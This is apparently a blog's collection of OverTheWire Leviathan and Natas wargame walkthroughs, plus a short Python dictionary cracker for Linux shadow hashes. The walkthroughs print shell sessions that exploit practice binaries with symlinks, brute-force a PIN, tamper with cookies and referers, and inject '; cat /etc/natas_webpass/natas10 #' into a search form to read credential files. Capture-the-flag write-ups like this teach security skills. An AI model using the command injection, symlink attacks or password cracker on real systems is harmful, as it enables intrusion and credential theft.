OverTheWire Leviathan Wargame Solution 2


Leviathan2 presents us with a small binary that belongs to the user leviathan3 and group leviathan2. The program contains a small security hole that can be exploited using a symbolic link.  To understand how the program functions at its core and what is happening behind the scenes when the program executes, we will use a few Linux commands and techniques to enlighten us with this information.

Edited: 3/18/2014:

  • Updated with current solution
  • Made more readable

Leviathan 2->3:

For the sake of this updated tutorial, we are going to go ahead and create a directory and a file with a space in the name all in one go:

We can see that the function access() and /bin/cat is being called on the file. What access() does is check permissions based on the process’ real user ID rather than the effective user ID. We can also see that /bin/cat/ is being…

View original post 204 more words

OverTheWire Natas Wargame Solutions 7-10

Let’s continue our progression through the Natas wargame server. The challenges ahead are slightly more difficult than the previous challenges which is why I chose to break where I did. Nevertheless, they are not impossible. Some entry level knowledge of PHP would go a long way here. Examine my solutions below:

Natas 6->7

Here we have an insecure PHP login form. Looking at the source, we can see that whatever we enter as the input secret is being compared to variable $_POST, within the PHP script. We also see the file “include/secret.inc is mentioned. We can tac that on to the end of our URL to see what it contains. Immediately, we will see it holds the secret variable “FOEIUWGHFEEUHOFUOIU”. Our script uses this variable to compare the input secret to, which means it is our password. Remember you need to change the URL to Natas7 to get access.



Natas 7->8

Now we are presented with a very nondescript web page containing two tabs, home and about. If we travel to the about page, and examine the source, we see a huge clue. It’s an HTML comment telling us that the password is held in /etc/natas_webpass/natas8. Awesome. But if you tac it on to the end of the URL like we have previously been doing it will not redirect you there. You need to tac it on the end of the”page=” variable.



Natas 8->9

Moving along we come across another PHP login form. Viewing the source we something that should catch your interest, the variable: $encodedSecret = “3d3d516343746d4d6d6c315669563362”;. This is going to be our password, insecurely stored, but encoded nevertheless. It is encoded with the function “encodeSecret” shown below.

Natas 8
The script Base64 encodes the secret->reverses that->then calls bin2hex() on that. We can actually use this script, in reverse order to get our secret. Create the script in a .php file like so:

<!--?php echo base64_decode(strrev(hex2bin("3d3d516343746d4d6d6c315669563362"))); ?-->

There are a couple of ways to run the script. If you are on some Linux flavor, and have PHP installed. You can run it inside your shell like this:

 php -f natas8.php

Or, if you have some web server like XAMPP or Apache/HTTPD installed, you can throw the script in /htdocs and simply navigate to the script. You will see the password as soon as you land on the page. It’s worth noting having a local web server is useful for many reasons.


Natas 9->10

Natas 9 presents us with a search form. Examining the source code, we see another PHP script.







We are not concerned with the fact that the form searches a dictionary file called dictionary.txt. Rather, we are interested in the fact the search form executes commands on the server. So, how can we leverage this?

We see that the script is greping the dictionary file. A little known fact about executing commands in this fashion is that we can chain commands together by using the shell command separator ;. Thinking back to Natas 7, we learned that the passwords are stored in /etc/natas_webpass/respectiveLevel. Let’s construct a chained command using this knowledge:

grep -i ; cat /etc/natas_webpass/natas10 # dictionary.txt

We used an additional argument in our command chain, the # operator.  That is used to comment anything after that operator. Thus, restricting our search to only /etc/natas_webpass/natas10. Finally, we are presented with our password:


OvertheWire Natas Wargame Solutions 0-6

The Natas series of games presents us with some challenges you might encounter while auditing serverside web-security. For the most part, they are examples of what programmers and administrators should not do. I will break up the challenges into small groups since there are 27 of them and it would be a great deal of writing. Serverside web-security is relevant to us because it is something users encounter most often. Every time you browse the web and interact with web applications, you are conversing with these protection mechanisms. Let’s take a look at the solutions to the following Natas challenges:

Natas 0->1

This one is easy enough, the password is on the page it says. View source and we can see the password in an html comment:

<!--The password for natas1 is gtVrDuiDfck831PqWsLEZy5gyDz1clto -->

Natas 1->2

The password for this one is found via the same method, except right-clicking has been blocked. It is blocked via JavaScript, so either disabling JavaScript in your browser or if you are like me and use a browser plugin like NoScript, you will be able to right-click anyway.

<!--The password for natas2 is ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi -->

Natas 2->3

Finding the password for Natas 3 requires us to explore a little more. Viewing the source, we see a couple of things: our Natas 2 pass embedded in some JavaScript and a link to a pixel image. We are not interested in the image itself, but the directory it is in. We can append /files to the end of our url and see the directory is readable. If we navigate to the users.txt file, we will see the password for Natas 3:


Natas 3->4

Viewing the source of this problem we can see an HTML comment “No more information leaks!! Not even Google will find it this time”. We can take that to mean the robots.txt file that is meant to disallow web bots from viewing certain directories within websites, if they decide to follow the rules… Navigating to /robots.txt we can see that the directory /s3cr3t/ is disallowed. Luckily for us, it is readable when navigating to it. Within you will see the users.txt file with the password for Natas 4:


Natas 4->5

Natas 4 presents us with a referral issue. It is blocking users being referred from anything other than http://natas5.natas.labs.overthewire.org/. For this we will use a Firefox browser plugin RefControl (You are using Firefox aren’t you?). Open up the RefControl options, add new site: http://natas4.natas.labs.overthewire.org/. Add a custom option with this in it: http://natas5.natas.labs.overthewire.org/. Press okay and refresh the page. We are magically presented with an access granted message and the password for Natas 5:


Natas 5->6

Now we are presented with a nondescript message ” Access disallowed. You are not logged in”. What could this really mean? If you guessed it has something to do with cookies, you were right. For problems like this, I use the awesome Firefox extension Firebug . Firebug now comes with the extension Firecookie, which allows on-the-fly viewing and editing of cookies in your browser. Install Firebug, right-click the page, and click on the cookies tab. You will see a cookie named “loggedin” for the natas5 domain. We can see it’s value is set to “0”. Let’s edit that and set it’s value to true or “1”. Do that, refresh the page, and we can now see the message “Access granted. The password for natas6”


Linux Password Cracker



It has been about a month since I have posted, that does not mean I have stopped coding. Lately I’ve been back on my “security” kick. Although for me it’s more of an obsession rather than just a kick. When it comes to security, a programming language like Python can make many common task a breeze to accomplish. Here I have a basic Linux password cracker that can crack the current SHA-512 shadowed hashes from a user supplied dictionary and detect whether a hash is the lesser used MD5 or SHA-256 format. Enjoy.

import crypt

def testPass(cryptPass):
hashType = cryptPass.split("$")[1]
if hashType == '1':
print "[+] Hash Type is MD5"
elif hashType == '5':
print "[+] Hash Type is SHA-256"
elif hashType == '6':
print "[+] Hash Type is SHA-512"
"[+] Hash Type is Unknown"

salt = cryptPass.split("$")[2]
dictFile = open('dictionary.txt', 'r')
for word in dictFile.readlines():
word = word.strip('\n')
pepper = "$" + hashType + "$" + salt
cryptWord = crypt.crypt(word, pepper)
if cryptWord == cryptPass:
print '[+] Found Password: ' + word + '\n'
print '[-] Password Not Found.\n'

def main():
passFile = open('passwords.txt')
for line in passFile.readlines():
if ':' in line:
user = line.split(':')[0]
cryptPass = line.split(':')[1].strip(' ')
print '[*] Cracking Password For: ' + user

if __name__ == '__main__':

OverTheWire Leviathan Wargame Solution 6

The final stage of Leviathan presents us with a problem that can be solved via some quick bash scripting. The binary in our home directory accepts a 4 digit combination as the password. Iterating through all the possible combination manually would take too much time. So we create a bash script to do this in a matter of seconds.


leviathan6@melinda:~$ ls
leviathan6@melinda:~$ ./leviathan6
usage: ./leviathan6 <4 digit code>
leviathan6@melinda:~$ ./leviathan6 1111

# Create a directory in /tmp to work in:
leviathan6@melinda:/$ mkdir /tmp/bashbrute
leviathan6@melinda:/$ cd /tmp/bashbrute/
leviathan6@melinda:/tmp/bashbrute$ nano brute.sh

#Remember to give your script execute privileges
leviathan6@melinda:/tmp/bashbrute$ chmod +x bashbrute.sh

Quick bash script I wrote that will brute force the binary, use this in brute.sh, or create your own…


for i in {0000..9999}
~/leviathan6 $i

Run the binary and simply wait for it to iterate through all possible number combinations. Note that we could echo out the password when we find it. Here the script will simply input the pass to the binary and pop us into leviathan7’s shell when it finds a match.

#Go ahead and run the script...
leviathan6@melinda:/tmp/bashbrute$ ./bashbrute.sh

#Let it run, takes about 20 seconds...

#Verify we are in Leviathan7's shell:
$ whoami

Alas, we have made it to the final level of Leviathan. Technically we are done. If you want, you can still cat leviathan7’s password and ssh over to the next level. There is a special congratulations message there for the winners.

leviathan7@melinda:~$ ls
leviathan7@melinda:~$ cat CON*
Well Done, you seem to have used a *nix system before, now try something more serious.

I hope the Leviathan series has been informative and fun for you as it was for me. You should have picked up some Linux skills as well as a few security skills. The congratulations message encourages us to try something more serious. I think I will begin posting my Natas solutions. Natas is about basic serverside web-security and might be a good change of pace. Stay tuned for future OvertheWire solutions and programming snippets.

OverTheWire Leviathan Wargame Solution 5

A lesson in symlinks is long overdue. In Leviathan 6, we will exploit a binary by using using symbolic linking to a file we have permission of. When we run the binary in Leviathan5’s home directory, it appears to be attempting to read from a file in /tmp. The binary is owned by Leviathan6 but belongs to the Leviathan5‘s group. Therefore, it can pull Leviathan6’s password.

Leviathan 5->6

leviathan5@melinda:~$ ls -la
-r-sr-x---   1 leviathan6 leviathan5 7501 Jun  6 13:59 leviathan5

#Try to run the binary
leviathan5@melinda:~$ ./leviathan5
/tmp/file.log: No such file or directory

#Since we need Leviathan 6's pass, symlink that to the log we create within the same command:
leviathan5@melinda:~$ ln -s /etc/leviathan_pass/leviathan6 /tmp/file.log

#Now run the binary, which apparently reads whatever is in /tmp/file.log
leviathan5@melinda:~$ ./leviathan5

We successfully exploited bad permissions placement on files via symlinking and now have Leviathan6’s pass as a result. These types of issues are still in existence in the real world believe it or not.

OverTheWire Leviathan Wargame Solution 4

Leviathan 5 takes only a few minutes to complete if you know where to look and it brings us to a fundamental concept in computing, the binary number system. Upon inspection of our new home directory we don’t see much. However, there is a trash directory here. Navigate to it to find a mysterious binary aptly named “bin”. After running it, we see sets of binary code as output. From here there are a couple of things we can do. We can copy and paste the output in an online binary to ASCII converter to translate it for us or probably use one of the tools in our shell to do this operation for us. For now, I have simply pasted it in an online converter.

Take a look at my shell output if you are lost:

Leviathan 4->5

leviathan4@melinda:~$ ls -la
total 24
drwxr-xr-x   3 root root       4096 Jun  6 13:59 .
drwxr-xr-x 149 root root       4096 Jun 14 09:49 ..
-rw-r--r--   1 root root        220 Apr  3  2012 .bash_logout
-rw-r--r--   1 root root       3486 Apr  3  2012 .bashrc
-rw-r--r--   1 root root        675 Apr  3  2012 .profile
dr-xr-x---   2 root leviathan4 4096 Jun  6 13:59 .trash
leviathan4@melinda:~$ cd .trash
leviathan4@melinda:~/.trash$ ls -la
total 16
dr-xr-x--- 2 root       leviathan4 4096 Jun  6 13:59 .
drwxr-xr-x 3 root       root       4096 Jun  6 13:59 ..
-r-sr-x--- 1 leviathan5 leviathan4 7254 Jun  6 13:59 bin

#Run the binary to see the output
leviathan4@melinda:~/.trash$ ./bin
01010100 01101001 01110100 01101000 00110100 01100011 01101111 01101011 01100101 01101001 00001010

After conversion of the binary output we have our password: Tith4cokei. We are ready to move along to Leviathan 6’s shell.

OverTheWire Leviathan Wargame Solution 3

For Leviathan 3, we keep things real simple.  We only need a few commands that we are already familiar with to get access to Leviathan4’s shell. When we finally do get his shell, we can cat his password in /etc/leviathan_pass/leviathan4 and correctly log in as him to begin level 4->5. Let’s take a look at my shell output.

Leviathan 3->4:

leviathan3@melissa:~$ ls

#We see a binary, so let's run it:

leviathan3@melissa:~$ ./level3
Enter the password> password
bzzzzzzzzap. WRONG

#Okay, let's see if there are any interesting strings in it:

leviathan3@melissa:~$ strings ./level3
[You've got shell]!
bzzzzzzzzap. WRONG
Enter the password>

#Okay, now we are working with something. The point of interest
#for us will be the snlprintf word. Right after that you see the
#words, "You've got shell!". Let's use that as the password:

leviathan3@melissa:~$ ./level3
Enter the password> snlprintf
[You've got shell]!
$ whoami

#Interesting phenomenon, we have been dumped into Leviathan4's shell
#All that is left to do is cat the password:

$ cat /etc/leviathan_pass/leviathan4

Just like that, we have the password for Leviathan 4. Why though? Some may already be familiar with snprintf in C. I am not familiar with any snlprintf(). So we can assume it is a made up function or actually is the password. Clearly it is a visible string in the binary. If you follow the logic in the strings output, you can crudely tell this is what pops the shell in main.

Other thoughts, maybe the L is for leviathan. One could also try using ltrace on the binary to look for strcmp() or similar functions that have the password as an argument. One could easily spend a fair amount of time trying things out on this challenge, the key is in plain site, but probably not what most people will be looking for.

OverTheWire Leviathan Wargame Solution 2

Leviathan2 presents us with a small binary that belongs to the user leviathan3 and group leviathan2. The program contains a small security hole that can be exploited using a symbolic link.  To understand how the program functions at its core and what is happening behind the scenes when the program executes, we will use a few Linux commands and techniques to enlighten us with this information.

Edited: 3/18/2014:

  • Updated with current solution
  • Made more readable

Leviathan 2->3:

leviathan2@melinda:~$ ls -la
total 28
drwxr-xr-x 2 root root 4096 Jun 6 2013 .
drwxr-xr-x 160 root root 4096 Oct 17 09:23 ..
-rw-r--r-- 1 root root 220 Apr 3 2012 .bash_logout
-rw-r--r-- 1 root root 3486 Apr 3 2012 .bashrc
-rw-r--r-- 1 root root 675 Apr 3 2012 .profile
-r-sr-x--- 1 leviathan3 leviathan2 7365 Jun 6 2013 printfile

#Running "printfile" we can see that it wants a file path

leviathan2@melinda:~$ ./printfile
*** File Printer ***
Usage: ./printfile filename

For the sake of this updated tutorial, we are going to go ahead and create a directory and a file with a space in the name all in one go:

mkdir /tmp/solveme && touch /tmp/solveme/file\ tmp.txt

#Let's relocate into our newly created directory:
cd /tmp/solveme

#Check what's inside, we see our file with a space:
leviathan2@melinda:/tmp/solveme$ ls -la
total 2560
drwxrwxr-x    2 leviathan2 leviathan2    4096 Mar 19 03:40 .
drwxrwx-wt 1826 root       root       2613248 Mar 19 03:40 ..
-rw-rw-r--    1 leviathan2 leviathan2       0 Mar 19 03:40 file tmp.txt

#Now, let's examine what is happening with ltrace:
leviathan2@melinda:/tmp/solveme$ ltrace ~/printfile "file tmp.txt"
__libc_start_main(0x80484f4, 2, -10348, 0x80485d0, 0x8048640
access("file tmp.txt", 4) = 0
snprintf("/bin/cat file tmp.txt", 511, "/bin/cat %s", "file tmp.txt") = 21
system("/bin/cat file tmp.txt"/bin/cat: file: Permission denied
/bin/cat: tmp.txt: No such file or directory
 <unfinished ...>
--- SIGCHLD (Child exited) ---
<... system resumed> ) = 256
+++ exited (status 0) +++

So, what is happening here is a small security hole in how this program functions. We can see that the function access() and /bin/cat are being called on the file. What access() does is check permissions based on the process’ real user ID rather than the effective user ID.

While access does use the full file path, the cat on the file is not using the full file path. We can see this near the end of the output where /bin/cat/ is being called to tmp.txt as if it were a separate file, it’s really the second half of our filename. This can be exploited if we create a symbolic link from the password file to the file we created in /tmp.

Let’s create the symbolic link, but with only the first part of the filename we created before the space.

leviathan2@melinda:/tmp/solveme$ ln -s /etc/leviathan_pass/leviathan3 /tmp/solveme/file

#Checking our directory, we see file tmp.txt was not converted
#to a symlink, but a separate symlink called "file" was created.

leviathan2@melinda:/tmp/solveme$ ls -la
total 2560
drwxrwxr-x 2 leviathan2 leviathan2 4096 Mar 19 03:41 .
drwxrwx-wt 1826 root root 2613248 Mar 19 03:56 ..
lrwxrwxrwx 1 leviathan2 leviathan2 30 Mar 19 03:41 file -> /etc/leviathan_pass/leviathan3
-rw-rw-r-- 1 leviathan2 leviathan2 0 Mar 19 03:40 file tmp.txt

Calling ~/printfile on the file that actually links to the password will fail.

leviathan2@melinda:/tmp/solveme$ ~/printfile "file"
You cant have that file...

#Hmmm, let's try calling it on the other file:
leviathan2@melinda:/tmp/solveme$ ~/printfile "file tmp.txt"
/bin/cat: tmp.txt: No such file or directory

Bingo, the file did actually access the symbolic link correctly up until file, but then tried to incorrectly cat the part of the file name after the space as if it were another file.

This all works because /printfile is owned by leviathan3. Access will call the symlink with that privilege. But we also needed to utilize a syntax hack to make it work, hence the filename with a space in it. Be sure to check out the reference pages for the access() and ltrace for some background.

Enjoy the password for level 3: Ahdiemoo1j

OverTheWire Leviathan Wargame Solution 1

Leviathan 1 presents us with a binary in our home directory.  If we run it we see that is a utility that ask and checks for a password. Knowing this, the binary is either reading the correct password from somewhere else or has it stored within the binary. In this case, the password is stored within the binary. We need to trace the binary. Many of you might catch the small hint to the movie Hackers within the binary. When Plague states the 4 most common passwords are love, sex, secret, and god.

Leviathan 1->2

leviathan1@melissa:~$ ls

#Let's run the binary to see how it functions:

leviathan1@melissa:~$ ./check
password: love
Wrong password, Good Bye ...

#Now let's try to see what functions it is calling:

leviathan1@melissa:~$ ltrace ./check
__libc_start_main(0x80484d4, 1, -10220, 0x80485a0, 0x8048600 <unfinished ...>
printf("password: ")                             = 10
getchar(0x8048660, 0x8049ff4, -10392, 0x80485b9, 0xf7ea2c3dpassword: love
) = 108
getchar(0x8048660, 0x8049ff4, -10392, 0x80485b9, 0xf7ea2c3d) = 111
getchar(0x8048660, 0x8049ff4, -10392, 0x80485b9, 0xf7ea2c3d) = 118
strcmp("lov", "sex")                             = -1
puts("Wrong password, Good Bye ..."Wrong password, Good Bye ...
)             = 29
+++ exited (status 0) +++

#We can see it is using strcmp() to check if an entered password is the same as it's stored string, "sex".
#Running the binary again we can now try entering "sex" as the password to test what will happen:

leviathan1@melissa:~$ ./check
password: sex
$ whoami

#A quick cat for the leviathan2's password and we are done here:

$ cat /etc/leviathan_pass/leviathan2

Alternate ways to solve this include running the strings command against the binary and hex dumping the binary.